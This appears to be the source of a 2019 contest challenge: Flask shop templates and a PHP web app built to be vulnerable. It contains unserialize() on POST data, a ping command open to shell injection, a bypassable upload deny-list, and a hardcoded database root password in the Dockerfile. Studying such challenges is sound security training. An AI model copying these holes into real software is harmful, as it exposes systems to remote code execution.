9 | 收货地址:{{ order_address.address }}
10 |
11 | {% if orderdetails %} 12 | 13 | {% for detail in orderdetails %} 14 |
15 | 商品细节
16 | 商家:{{ detail.product.supplier.first().supplier_name}}
17 | 商品:{{ detail.product.name }}
18 | 价格:{{ detail.product.price }}
19 | 订购数量:{{ detail.product_count}}
20 |
21 | 22 | 23 |
24 | {% endfor %} 25 |
26 | {% endif %} 27 | {% if current_user.table_name =="Crew"%} 28 |
29 | 30 |         确认发货 31 | 32 |
33 | {% endif %} 34 | 35 | {% endblock content %} 36 | -------------------------------------------------------------------------------- /Flaskshop/taobao/templates/show_supplier_product.html: -------------------------------------------------------------------------------- 1 | {% extends "account_layout.html" %} 2 | {% block info %} 3 |

我的产品列表


4 | {% if products %} 5 | 继续 添加产品 6 | {% for product in products %} 7 |
8 | 9 | 商品名称:{{ product.name }}
10 | 商品类别:{{ product.sort }}
11 | 商品价格:{{ product.price }}
12 | 商品细节:{{ product.detail }}
13 | 商品剩余库存量:{{ product.product_count }}
14 | ----------------------------------------------
15 | 修改商品信息 16 | 删除产品信息 17 | 增加库存 18 |
19 | 20 |
21 |
22 |
23 | {% endfor %} 24 | {% else %} 25 | 尚未添加任何商品 点击此处添加 26 | {% endif %} 27 | 28 | {% endblock info %} 29 | -------------------------------------------------------------------------------- /Flaskshop/taobao/templates/supplier_account.html: -------------------------------------------------------------------------------- 1 | {% extends "account_layout.html" %} 2 | {% block info %} 3 |
4 |
5 | 管理我的商品
6 | 管理雇员
7 | 管理我的基本信息
8 | 完善我的其他信息
9 | 10 | {% endblock info %} 11 | -------------------------------------------------------------------------------- /Flaskshop/taobao/templates/supplier_add_product_count.html: -------------------------------------------------------------------------------- 1 | {% extends "layout.html" %} 2 | {% block content %} 3 |
4 |
5 | {{ form.hidden_tag() }} 6 |
7 | 增加商品库存 8 |
9 | {{ form.count.label(class="form-control-label") }} 10 | {% if form.count.errors %} 11 | {{ form.count(class="form-control form-control-lg is-invalid") }} 12 |
13 | {% for error in form.count.errors %} 14 | {{ error }} 15 | {% endfor %} 16 |
17 | {% else %} 18 | {{ form.count(class="form-control form-control-lg") }} 19 | {% endif %} 20 |
21 |
22 | {{ form.confirm.label(class="form-control-label") }} 23 | {% if form.confirm.errors %} 24 | {{ form.confirm(class="form-control form-control-lg is-invalid") }} 25 |
26 | {% for error in form.confirm.errors %} 27 | {{ error }} 28 | {% endfor %} 29 |
30 | {% else %} 31 | {{ form.confirm(class="form-control form-control-lg") }} 32 | {% endif %} 33 |
34 |
35 |
36 | {{ form.submit(class="btn btn-outline-info") }} 37 |
38 |
39 |
40 | {% endblock content %} 41 | -------------------------------------------------------------------------------- /Flaskshop/taobao/templates/supplier_crew_manager.html: -------------------------------------------------------------------------------- 1 | {% extends "account_layout.html" %} 2 | {% block info %} 3 | 去人才市场看看,雇几个伙计??
4 | 查看我的雇员
5 | 6 | {% endblock info %} 7 | -------------------------------------------------------------------------------- /Flaskshop/taobao/templates/supplier_product_manager.html: -------------------------------------------------------------------------------- 1 | {% extends "account_layout.html" %} 2 | {% block info %} 3 |

商品管理

4 | 5 | 添加产品
6 | 查看我的产品
7 | 8 | {% endblock info %} 9 | -------------------------------------------------------------------------------- /Flaskshop/taobao/templates/traning_orders.html: -------------------------------------------------------------------------------- 1 | {% extends "account_layout.html" %} 2 | {% block info %} 3 |

送货中的订单


4 | {% if orders %} 5 | {% for order in orders %} 6 |
7 | 订单编号:{{ order.id}}
8 | 下单时间:{{ order.start_time}}
9 | 订单价格:{{ order.total_price }}
10 | 订单的状态:成功发货,正在派送
11 | 订单详情

12 | 我很满意,确认收货 13 |
14 | {% endfor %} 15 | {% else %} 16 | 空空如也,什么也没有哦。 17 | {% endif %} 18 | 19 | {% endblock info %} 20 | -------------------------------------------------------------------------------- /Flaskshop/taobao/templates/update_customer_detail.html: -------------------------------------------------------------------------------- 1 | {% extends "layout.html" %} 2 | {% block content %} 3 |
4 |
5 | {{ form.hidden_tag() }} 6 |
7 | 修改收获地址 8 |
9 | {{ form.consignee.label(class="form-control-label") }} 10 | 11 | {% if form.consignee.errors %} 12 | {{ form.consignee(class="form-control form-control-lg is-invalid") }} 13 |
14 | {% for error in form.consignee.errors %} 15 | {{ error }} 16 | {% endfor %} 17 |
18 | {% else %} 19 | {{ form.consignee(class="form-control form-control-lg") }} 20 | {% endif %} 21 |
22 |
23 | {{ form.address.label(class="form-control-label") }} 24 | 25 | {% if form.address.errors %} 26 | {{ form.address(class="form-control form-control-lg is-invalid") }} 27 |
28 | {% for error in form.address.errors %} 29 | {{ error }} 30 | {% endfor %} 31 |
32 | {% else %} 33 | {{ form.address(class="form-control form-control-lg") }} 34 | {% endif %} 35 |
36 |
37 | {{ form.telephone.label(class="form-control-label") }} 38 | {% if form.telephone.errors %} 39 | {{ form.telephone(class="form-control form-control-lg is-invalid") }} 40 |
41 | {% for error in form.telephone.errors %} 42 | {{ error }} 43 | {% endfor %} 44 |
45 | {% else %} 46 | {{ form.telephone(class="form-control form-control-lg") }} 47 | {% endif %} 48 |
49 |
50 |
51 | {{ form.submit(class="btn btn-outline-info") }} 52 |
53 |
54 |
55 | {% endblock content %} 56 | -------------------------------------------------------------------------------- /Flaskshop/taobao/templates/update_info.html: -------------------------------------------------------------------------------- 1 | {% extends "layout.html" %} 2 | {% block content %} 3 |
4 | 点击此处修改我的密码 5 |
6 |
7 |
8 | {{ form.hidden_tag() }} 9 |
10 | 更新我的基本信息 11 |
12 | {{ form.username.label(class="form-control-label") }} 13 | 14 | {% if form.username.errors %} 15 | {{ form.username(class="form-control form-control-lg is-invalid") }} 16 |
17 | {% for error in form.username.errors %} 18 | {{ error }} 19 | {% endfor %} 20 |
21 | {% else %} 22 | {{ form.username(class="form-control form-control-lg") }} 23 | {% endif %} 24 |
25 |
26 | {{ form.email.label(class="form-control-label") }} 27 | {% if form.email.errors %} 28 | {{ form.email(class="form-control form-control-lg is-invalid") }} 29 |
30 | {% for error in form.email.errors %} 31 | {{ error }} 32 | {% endfor %} 33 |
34 | {% else %} 35 | {{ form.email(class="form-control form-control-lg") }} 36 | {% endif %} 37 |
38 |
39 |
40 | {{ form.submit(class="btn btn-outline-info") }} 41 |
42 |
43 |
44 | 45 | {% endblock content %} 46 | -------------------------------------------------------------------------------- /Flaskshop/taobao/templates/update_password.html: -------------------------------------------------------------------------------- 1 | {% extends "layout.html" %} 2 | {% block content %} 3 | 4 |
5 |
6 | {{ form.hidden_tag() }} 7 |
8 | 更新我的密码 9 |
10 | {{ form.password.label(class="form-control-label") }} 11 | 12 | {% if form.password.errors %} 13 | {{ form.password(class="form-control form-control-lg is-invalid") }} 14 |
15 | {% for error in form.password.errors %} 16 | {{ error }} 17 | {% endfor %} 18 |
19 | {% else %} 20 | {{ form.password(class="form-control form-control-lg") }} 21 | {% endif %} 22 |
23 |
24 | {{ form.confirm_password.label(class="form-control-label") }} 25 | {% if form.confirm_password.errors %} 26 | {{ form.confirm_password(class="form-control form-control-lg is-invalid") }} 27 |
28 | {% for error in form.confirm_password.errors %} 29 | {{ error }} 30 | {% endfor %} 31 |
32 | {% else %} 33 | {{ form.confirm_password(class="form-control form-control-lg") }} 34 | {% endif %} 35 |
36 |
37 |
38 | {{ form.submit(class="btn btn-outline-info") }} 39 |
40 |
41 |
42 | 43 | {% endblock content %} 44 | -------------------------------------------------------------------------------- /Flaskshop/taobao/templates/upload.html: -------------------------------------------------------------------------------- 1 | {% extends "layout.html" %} 2 | {% block content %} 3 | 4 | 5 | 6 | 7 | upload 8 | 9 | 10 |

文件上传

11 |
12 | 13 | 14 |
15 | {{msg}} 16 | 17 | 18 | 19 | {% endblock content %} 20 | -------------------------------------------------------------------------------- /Flaskshop/taobao/templates/waitting_orders.html: -------------------------------------------------------------------------------- 1 | {% extends "account_layout.html" %} 2 | {% block info %} 3 |

等待发货的订单


4 | {% if orders %} 5 | {% for order in orders %} 6 |
7 | 订单编号:{{ order.id}}
8 | 下单时间:{{ order.start_time}}
9 | 订单价格:{{ order.total_price }}
10 | 订单的状态:应经成功付款,但尚未发货
11 | 订单详情 12 | 13 | 14 |         取消订单 15 | 16 |
17 | {% endfor %} 18 | {% else %} 19 | 空空如也,什么也没有哦。 20 | {% endif %} 21 | 22 | {% endblock info %} 23 | -------------------------------------------------------------------------------- /Flaskshop/writeup.pdf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/GinkgoTeam/YJTZB_2019/7acb23f145ff70e09baade92e6b5a65856b36a1e/Flaskshop/writeup.pdf -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2019 GinkgoTeam 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 
22 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # 2019应急挑战杯 2 | 2019年”应急挑战杯“大学生网络安全邀请赛题目源码及writeUP 3 | -------------------------------------------------------------------------------- /easyWEB/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: "2" 2 | services: 3 | web1: 4 | build: ./web1 5 | container_name: 0511_web1 6 | volumes: 7 | - /web1flag:/flag 8 | - ./web1/code/:/var/www/html 9 | restart: always 10 | ports: 11 | - "8000:80" 12 | -------------------------------------------------------------------------------- /easyWEB/web1/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM ubuntu:14.04 2 | # NOTE(review): ubuntu:14.04 is past its standard support window, and the first RUN below deletes every sources.list line containing "security", so packages are installed without security updates; only suitable for an isolated, deliberately vulnerable lab image. 3 | COPY html/ /var/www/html/ 4 | 5 | RUN sed -i 's/http:\/\/archive.ubuntu.com\/ubuntu\//http:\/\/mirrors.tuna.tsinghua.edu.cn\/ubuntu\//g' /etc/apt/sources.list && \ 6 | sed -i '/security/d' /etc/apt/sources.list && \ 7 | apt-get update -y && \ 8 | apt-get -yqq install supervisor mariadb-server apache2 php5 libapache2-mod-php5 \ 9 | php5-mysql php5-mcrypt ssh && \ 10 | # config: remove the word "Indexes" from lines 154 and 165 of apache2.conf (presumably the Options lines, to turn off directory listings; the line numbers depend on this package version) 11 | sed -i "154s/Indexes//" /etc/apache2/apache2.conf && \ 12 | sed -i "165s/Indexes//" /etc/apache2/apache2.conf && \ 13 | /etc/init.d/apache2 start && \ 14 | # mysql: recreate the data dir, set the root password and import geez.sql. NOTE(review): the password is a literal here, so anyone with the Dockerfile or the image history can read it; outside a lab it would be supplied at runtime. 15 | rm -rf /var/lib/mysql && \ 16 | mysql_install_db --user=mysql --datadir=/var/lib/mysql && \ 17 | sh -c 'mysqld_safe &' && \ 18 | sleep 5s && \ 19 | mysqladmin -uroot password '334cc35b3c704593' && \ 20 | mysql -e "source /var/www/html/geez.sql;" -uroot -p334cc35b3c704593 21 | # supervisor 22 | RUN mkdir -p /var/log/supervisor && \ 23 | mv /var/www/html/supervisord.conf /etc/ && \ 24 | # hand the web root to www-data, then remove the SQL dump and default index page and truncate log.php 25 | chown -R www-data:www-data /var/www/html/ && \ 26 | chmod -R 755 /var/www/html/ && \ 27 | rm /var/www/html/geez.sql /var/www/html/index.html && \ 28 | cat /dev/null > /var/www/html/log.php 29 |
30 | EXPOSE 80 31 | 32 | ENTRYPOINT ["supervisord", "-n"] 33 | -------------------------------------------------------------------------------- /easyWEB/web1/html/common/cacf.php: -------------------------------------------------------------------------------- 1 | test); 8 | fclose($fp); 9 | } 10 | } 11 | // Check whether $data has the shape of a PHP-serialized value; this is a format test, not a safety check 12 | function is_serialized( $data ) { 13 | $data = trim( $data ); 14 | if ( 'N;' == $data ) 15 | return true; 16 | if ( !preg_match( '/^([adObis]):/', $data, $badions ) ) 17 | return false; 18 | switch ( $badions[1] ) { 19 | case 'a' : 20 | case 'O' : 21 | case 's' : 22 | if ( preg_match( "/^{$badions[1]}:[0-9]+:.*[;}]\$/s", $data ) ) 23 | return true; 24 | break; 25 | case 'b' : 26 | case 'i' : 27 | case 'd' : 28 | if ( preg_match( "/^{$badions[1]}:[0-9.E-]+;\$/", $data ) ) 29 | return true; 30 | break; 31 | } 32 | return false; 33 | } 34 | /* NOTE(review): the handler below hands $_POST['name'] to unserialize() as soon as it passes the format test above. Deserializing request data lets the sender decide which classes are instantiated and which magic methods run; the class whose tail is visible at the top of this file (its beginning is missing from this listing) ends in code that calls fclose($fp). Both branches also echo the raw value without htmlspecialchars(). Request input should be parsed as plain data, e.g. with json_decode(). */ 35 | 36 | if(isset($_POST['name'])){ 37 | $post_data=$_POST['name']; 38 | if(is_serialized($post_data)){ 39 | echo $post_data; 40 | unserialize($post_data); 41 | } 42 | else{ 43 | echo "Hello ".$post_data.",Your resume scored ".mt_rand(60,100)." points"; 44 | } 45 | 46 | } 47 | else{ 48 | echo("请输入你的名字"); 49 | } 50 | 51 | // $class4 = new chybeta(); 52 | // $class4->test = ''; 53 | // $class4_ser = serialize($class4); 54 | // print_r($class4_ser); 55 | ?> 56 | 57 |
58 | 59 | 60 |
61 | -------------------------------------------------------------------------------- /easyWEB/web1/html/common/function.php: -------------------------------------------------------------------------------- 1 | '.$action.'();'); 21 | } 22 | } 23 | 24 | 25 | 26 | ?> 27 | -------------------------------------------------------------------------------- /easyWEB/web1/html/common/home.php: -------------------------------------------------------------------------------- 1 | method = $method; 11 | $this->args = $args; 12 | } 13 | /* Destructor: dispatches to $this->method with $this->args, but only when the method name is "ping". */ 14 | function __destruct(){ 15 | if (in_array($this->method, array("ping"))) { 16 | call_user_func_array(array($this, $this->method), $this->args); 17 | } 18 | } 19 | /* NOTE(review): $host is interpolated into the command string given to system(). The filtering in __wakeup() below is SQL escaping plus space removal, which is not shell quoting; wrap the value in escapeshellarg() or validate it as a hostname/IP before building the command. */ 20 | function ping($host){ 21 | system("ping -c 2 $host"); 22 | } 23 | function waf($str){ 24 | $str=str_replace(' ','',$str); 25 | return $str; 26 | } 27 | /* __wakeup(): PHP calls this when the object is unserialized; it trims, SQL-escapes and strips spaces from every entry of $this->args. */ 28 | function __wakeup(){ 29 | foreach($this->args as $k => $v) { 30 | $this->args[$k] = $this->waf(trim(mysql_escape_string($v))); 31 | } 32 | } 33 | } 34 | $a=@$_POST['a']; /* NOTE(review): the next line base64-decodes this request parameter and unserializes it, so object state comes from the request, and the @ operators hide any error. Accept plain data (for example JSON) here rather than serialized objects. */ 35 | @unserialize(base64_decode($a)); 36 | ?> 37 | -------------------------------------------------------------------------------- /easyWEB/web1/html/geez.sql: -------------------------------------------------------------------------------- 1 | # Host: 127.0.0.1 (Version: 5.5.53) 2 | # Date: 2018-10-20 19:40:25 3 | # Generator: MySQL-Front 5.3 (Build 4.234) 4 | 5 | /*!40101 SET NAMES utf8 */; 6 | 7 | # 8 | # Structure for table "users" 9 | # 10 | 11 | 12 | SET SQL_MODE = "NO_AUTO_VALUE_ON_ZERO"; 13 | SET AUTOCOMMIT = 0; 14 | START TRANSACTION; 15 | SET time_zone = "+00:00"; 16 | 17 | DROP DATABASE IF EXISTS `geez`; 18 | CREATE DATABASE `geez` DEFAULT CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci; 19 | USE geez; 20 | 21 | DROP TABLE IF EXISTS `users`; 22 | CREATE TABLE `users` ( 23 | `username` varchar(30) NOT NULL, 24 | `phonenumber` varchar(20) DEFAULT NULL, 25 | `QQ` varchar(20) DEFAULT NULL, 26 | `email` varchar(20) DEFAULT NULL, 27 | `photo` 
varchar(255) DEFAULT NULL, 28 | `reward` varchar(255) DEFAULT NULL, 29 | `motto` varchar(255) DEFAULT NULL, 30 | `sex` int(1) NOT NULL, 31 | `id` int(5) NOT NULL AUTO_INCREMENT, 32 | `age` int(3) NOT NULL, 33 | `password` varchar(50) NOT NULL, 34 | `birthday` varchar(255) DEFAULT '19970911', 35 | PRIMARY KEY (`id`) 36 | ) ENGINE=MyISAM AUTO_INCREMENT=3 DEFAULT CHARSET=utf8; 37 | 38 | # 39 | # Data for table "users" 40 | # 41 | # NOTE(review): the password value inserted below is 32 hex digits, which looks like an unsalted MD5 digest (confirm against the login code); passwords belong in a dedicated password hash such as PHP's password_hash(). 42 | /*!40000 ALTER TABLE `users` DISABLE KEYS */; 43 | INSERT INTO `users` VALUES ('admin',NULL,NULL,NULL,'./upload/admin_xf.jpg','装13一等奖!抄写部长名字一等奖',NULL,0,1,19,'23e38db370b570dbd07added13dfc001','19970911'); 44 | /*!40000 ALTER TABLE `users` ENABLE KEYS */; 45 | -------------------------------------------------------------------------------- /easyWEB/web1/html/include/config.php: -------------------------------------------------------------------------------- 1 | 15 | -------------------------------------------------------------------------------- /easyWEB/web1/html/include/log1.php: -------------------------------------------------------------------------------- 1 | 10 | -------------------------------------------------------------------------------- /easyWEB/web1/html/include/shell.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /easyWEB/web1/html/index.php: -------------------------------------------------------------------------------- 1 | 16 | -------------------------------------------------------------------------------- /easyWEB/web1/html/lib/File.php: -------------------------------------------------------------------------------- 1 | typelist==array("image/jpeg","image/jpg","image/png","image/gif"); /* NOTE(review): as shown in this listing this is a comparison (==), not an assignment, so no MIME allow-list is stored; save() below never reads typelist either. */ 15 | $this->notallow=array("php", "php5", "php3", "php4", "php7", "pht", "phtml", "htaccess","html", "swf", "htm"); 16 | $this->path='./upload'; 17 | } 18 | /* save(): moves the uploaded file $_FILES['pic'] to ./upload/<session id>_<filename>.<lower-cased extension> and returns that path, or False if the move fails; exits on a deny-listed extension or an existing target. */ 19 | function save(){ 20 | /* NOTE(review): the deny-list test below compares the extension exactly as submitted, while the stored name uses strtolower(), so the check and the saved file can disagree. Lower-case before checking, prefer an allow-list of image extensions, and keep uploads in a directory the web server will not execute. pathinfo() also returns no "extension" key for a name without a dot. */ 21 | $id=$_SESSION['id']; 22 | 
$upfile=$_FILES['pic']; 23 | $fileinfo=pathinfo($upfile["name"]); 24 | if(in_array($fileinfo["extension"],$this->notallow)){ 25 | exit('error'); 26 | } 27 | $path='./upload/'.$id."_".$fileinfo["filename"].".".strtolower($fileinfo["extension"]); 28 | if (file_exists($path)){ 29 | exit("file already exists"); 30 | } 31 | if(move_uploaded_file($upfile['tmp_name'], $path)){ 32 | //return True; 33 | return $path; 34 | }else{ 35 | return False; 36 | } 37 | } 38 | } 39 | ?> 40 | -------------------------------------------------------------------------------- /easyWEB/web1/html/lib/base.php: -------------------------------------------------------------------------------- 1 | tp= new Smarty(); 13 | $this->tp->left_delimiter='{'; 14 | $this->tp->right_delimiter='}'; 15 | $this->tp->template_dir='templates'; // HTML template directory 16 | $this->tp->compile_dir='template_c'; // compiled template files 17 | $this->tp->cache_dir='cache'; // cache directory 18 | $this->tp->caching=false; // caching switch (off here) 19 | $this->tp->cache_lifetime=120;// cache lifetime 20 | } 21 | } 22 | 23 | 24 | 25 | ?> -------------------------------------------------------------------------------- /easyWEB/web1/html/lib/run.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /easyWEB/web1/html/org/smarty/Autofoucer.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /easyWEB/web1/html/org/smarty/plugins/function.counter.php: -------------------------------------------------------------------------------- 1 | 12 | * Name: counter
13 | * Purpose: print out a counter value 14 | * 15 | * @author Monte Ohrt 16 | * @link http://www.smarty.net/manual/en/language.function.counter.php {counter} 17 | * (Smarty online manual) 18 | * 19 | * @param array $params parameters 20 | * @param Smarty_Internal_Template $template template object 21 | * 22 | * @return string|null 23 | */ 24 | function smarty_function_counter($params, $template) 25 | { 26 | static $counters = array(); 27 | 28 | $name = (isset($params['name'])) ? $params['name'] : 'default'; 29 | if (!isset($counters[$name])) { 30 | $counters[$name] = array( 31 | 'start' => 1, 32 | 'skip' => 1, 33 | 'direction' => 'up', 34 | 'count' => 1 35 | ); 36 | } 37 | $counter =& $counters[$name]; 38 | 39 | if (isset($params['start'])) { 40 | $counter['start'] = $counter['count'] = (int) $params['start']; 41 | } 42 | 43 | if (!empty($params['assign'])) { 44 | $counter['assign'] = $params['assign']; 45 | } 46 | 47 | if (isset($counter['assign'])) { 48 | $template->assign($counter['assign'], $counter['count']); 49 | } 50 | 51 | if (isset($params['print'])) { 52 | $print = (bool) $params['print']; 53 | } else { 54 | $print = empty($counter['assign']); 55 | } 56 | 57 | if ($print) { 58 | $retval = $counter['count']; 59 | } else { 60 | $retval = null; 61 | } 62 | 63 | if (isset($params['skip'])) { 64 | $counter['skip'] = $params['skip']; 65 | } 66 | 67 | if (isset($params['direction'])) { 68 | $counter['direction'] = $params['direction']; 69 | } 70 | 71 | if ($counter['direction'] == "down") { 72 | $counter['count'] -= $counter['skip']; 73 | } else { 74 | $counter['count'] += $counter['skip']; 75 | } 76 | 77 | return $retval; 78 | } 79 | -------------------------------------------------------------------------------- /easyWEB/web1/html/org/smarty/plugins/modifier.date_format.php: -------------------------------------------------------------------------------- 1 | 12 | * Name: date_format
13 | * Purpose: format datestamps via strftime
14 | * Input:
15 | * - string: input date string 16 | * - format: strftime format for output 17 | * - default_date: default date if $string is empty 18 | * 19 | * @link http://www.smarty.net/manual/en/language.modifier.date.format.php date_format (Smarty online manual) 20 | * @author Monte Ohrt 21 | * 22 | * @param string $string input date string 23 | * @param string $format strftime format for output 24 | * @param string $default_date default date if $string is empty 25 | * @param string $formatter either 'strftime' or 'auto' 26 | * 27 | * @return string |void 28 | * @uses smarty_make_timestamp() 29 | */ 30 | function smarty_modifier_date_format($string, $format = null, $default_date = '', $formatter = 'auto') 31 | { 32 | if ($format === null) { 33 | $format = Smarty::$_DATE_FORMAT; 34 | } 35 | /** 36 | * require_once the {@link shared.make_timestamp.php} plugin 37 | */ 38 | require_once(SMARTY_PLUGINS_DIR . 'shared.make_timestamp.php'); 39 | if ($string != '' && $string != '0000-00-00' && $string != '0000-00-00 00:00:00') { 40 | $timestamp = smarty_make_timestamp($string); 41 | } elseif ($default_date != '') { 42 | $timestamp = smarty_make_timestamp($default_date); 43 | } else { 44 | return; 45 | } 46 | if ($formatter == 'strftime' || ($formatter == 'auto' && strpos($format, '%') !== false)) { 47 | if (DS == '\\') { 48 | $_win_from = array('%D', '%h', '%n', '%r', '%R', '%t', '%T'); 49 | $_win_to = array('%m/%d/%y', '%b', "\n", '%I:%M:%S %p', '%H:%M', "\t", '%H:%M:%S'); 50 | if (strpos($format, '%e') !== false) { 51 | $_win_from[] = '%e'; 52 | $_win_to[] = sprintf('%\' 2d', date('j', $timestamp)); 53 | } 54 | if (strpos($format, '%l') !== false) { 55 | $_win_from[] = '%l'; 56 | $_win_to[] = sprintf('%\' 2d', date('h', $timestamp)); 57 | } 58 | $format = str_replace($_win_from, $_win_to, $format); 59 | } 60 | 61 | return strftime($format, $timestamp); 62 | } else { 63 | return date($format, $timestamp); 64 | } 65 | } 66 | 
-------------------------------------------------------------------------------- /easyWEB/web1/html/org/smarty/plugins/modifier.regex_replace.php: -------------------------------------------------------------------------------- 1 | 12 | * Name: regex_replace
13 | * Purpose: regular expression search/replace 14 | * 15 | * @link http://smarty.php.net/manual/en/language.modifier.regex.replace.php 16 | * regex_replace (Smarty online manual) 17 | * @author Monte Ohrt 18 | * 19 | * @param string $string input string 20 | * @param string|array $search regular expression(s) to search for 21 | * @param string|array $replace string(s) to insert in place of each match 22 | * 23 | * @return string 24 | */ 25 | function smarty_modifier_regex_replace($string, $search, $replace) 26 | { 27 | if (is_array($search)) { 28 | foreach ($search as $idx => $s) { 29 | $search[$idx] = _smarty_regex_replace_check($s); 30 | } 31 | } else { 32 | $search = _smarty_regex_replace_check($search); 33 | } 34 | // every pattern has been passed through _smarty_regex_replace_check() before it reaches preg_replace() 35 | return preg_replace($search, $replace, $string); 36 | } 37 | 38 | /** 39 | * @param string $search regular expression to sanitize 40 | * The pattern is cut at the first NUL byte, and the "e" (evaluate replacement as PHP) modifier plus any whitespace is removed from its trailing modifier letters, so a pattern cannot make preg_replace() execute the replacement as code. The "e" modifier only exists before PHP 7.0. 41 | * @return string 42 | * @ignore 43 | */ 44 | function _smarty_regex_replace_check($search) 45 | { 46 | // null-byte injection detection 47 | // anything behind the first null-byte is ignored 48 | if (($pos = strpos($search, "\0")) !== false) { 49 | $search = substr($search, 0, $pos); 50 | } 51 | // remove eval-modifier from $search 52 | if (preg_match('!([a-zA-Z\s]+)$!s', $search, $match) && (strpos($match[1], 'e') !== false)) { 53 | $search = substr($search, 0, - strlen($match[1])) . preg_replace('![e\s]+!', '', $match[1]); 54 | } 55 | 56 | return $search; 57 | } 58 | -------------------------------------------------------------------------------- /easyWEB/web1/html/org/smarty/plugins/modifier.replace.php: -------------------------------------------------------------------------------- 1 | 12 | * Name: replace
13 | * Purpose: simple search/replace 14 | * 15 | * @link http://smarty.php.net/manual/en/language.modifier.replace.php replace (Smarty online manual) 16 | * @author Monte Ohrt 17 | * @author Uwe Tews 18 | * 19 | * @param string $string input string 20 | * @param string $search text to search for 21 | * @param string $replace replacement text 22 | * 23 | * @return string 24 | */ 25 | function smarty_modifier_replace($string, $search, $replace) 26 | { 27 | if (Smarty::$_MBSTRING) { 28 | require_once(SMARTY_PLUGINS_DIR . 'shared.mb_str_replace.php'); 29 | 30 | return smarty_mb_str_replace($search, $replace, $string); 31 | } 32 | 33 | return str_replace($search, $replace, $string); 34 | } 35 | -------------------------------------------------------------------------------- /easyWEB/web1/html/org/smarty/plugins/modifier.spacify.php: -------------------------------------------------------------------------------- 1 | 12 | * Name: spacify
13 | * Purpose: add spaces between characters in a string 14 | * 15 | * @link http://smarty.php.net/manual/en/language.modifier.spacify.php spacify (Smarty online manual) 16 | * @author Monte Ohrt 17 | * 18 | * @param string $string input string 19 | * @param string $spacify_char string to insert between characters. 20 | * 21 | * @return string 22 | */ 23 | function smarty_modifier_spacify($string, $spacify_char = ' ') 24 | { 25 | // well… what about charsets besides latin and UTF-8? 26 | return implode($spacify_char, preg_split('//' . Smarty::$_UTF8_MODIFIER, $string, - 1, PREG_SPLIT_NO_EMPTY)); 27 | } 28 | -------------------------------------------------------------------------------- /easyWEB/web1/html/org/smarty/plugins/modifier.truncate.php: -------------------------------------------------------------------------------- 1 | 12 | * Name: truncate
13 | * Purpose: Truncate a string to a certain length if necessary, 14 | * optionally splitting in the middle of a word, and 15 | * appending the $etc string or inserting $etc into the middle. 16 | * 17 | * @link http://smarty.php.net/manual/en/language.modifier.truncate.php truncate (Smarty online manual) 18 | * @author Monte Ohrt 19 | * 20 | * @param string $string input string 21 | * @param integer $length length of truncated text 22 | * @param string $etc end string 23 | * @param boolean $break_words truncate at word boundary 24 | * @param boolean $middle truncate in the middle of text 25 | * 26 | * @return string truncated string 27 | */ 28 | function smarty_modifier_truncate($string, $length = 80, $etc = '...', $break_words = false, $middle = false) 29 | { 30 | if ($length == 0) { 31 | return ''; 32 | } 33 | 34 | if (Smarty::$_MBSTRING) { 35 | if (mb_strlen($string, Smarty::$_CHARSET) > $length) { 36 | $length -= min($length, mb_strlen($etc, Smarty::$_CHARSET)); 37 | if (!$break_words && !$middle) { 38 | $string = preg_replace('/\s+?(\S+)?$/' . Smarty::$_UTF8_MODIFIER, '', mb_substr($string, 0, $length + 1, Smarty::$_CHARSET)); 39 | } 40 | if (!$middle) { 41 | return mb_substr($string, 0, $length, Smarty::$_CHARSET) . $etc; 42 | } 43 | 44 | return mb_substr($string, 0, $length / 2, Smarty::$_CHARSET) . $etc . mb_substr($string, - $length / 2, $length, Smarty::$_CHARSET); 45 | } 46 | 47 | return $string; 48 | } 49 | 50 | // no MBString fallback 51 | if (isset($string[$length])) { 52 | $length -= min($length, strlen($etc)); 53 | if (!$break_words && !$middle) { 54 | $string = preg_replace('/\s+?(\S+)?$/', '', substr($string, 0, $length + 1)); 55 | } 56 | if (!$middle) { 57 | return substr($string, 0, $length) . $etc; 58 | } 59 | 60 | return substr($string, 0, $length / 2) . $etc . 
substr($string, - $length / 2); 61 | } 62 | 63 | return $string; 64 | } 65 | -------------------------------------------------------------------------------- /easyWEB/web1/html/org/smarty/plugins/modifiercompiler.cat.php: -------------------------------------------------------------------------------- 1 | 12 | * Name: cat
13 | * Date: Feb 24, 2003
14 | * Purpose: catenate a value to a variable
15 | * Input: string to catenate
16 | * Example: {$var|cat:"foo"} 17 | * 18 | * @link http://smarty.php.net/manual/en/language.modifier.cat.php cat 19 | * (Smarty online manual) 20 | * @author Uwe Tews 21 | * 22 | * @param array $params parameters 23 | * 24 | * @return string with compiled code 25 | */ 26 | function smarty_modifiercompiler_cat($params) 27 | { 28 | return '(' . implode(').(', $params) . ')'; 29 | } 30 | -------------------------------------------------------------------------------- /easyWEB/web1/html/org/smarty/plugins/modifiercompiler.count_characters.php: -------------------------------------------------------------------------------- 1 | 12 | * Name: count_characteres
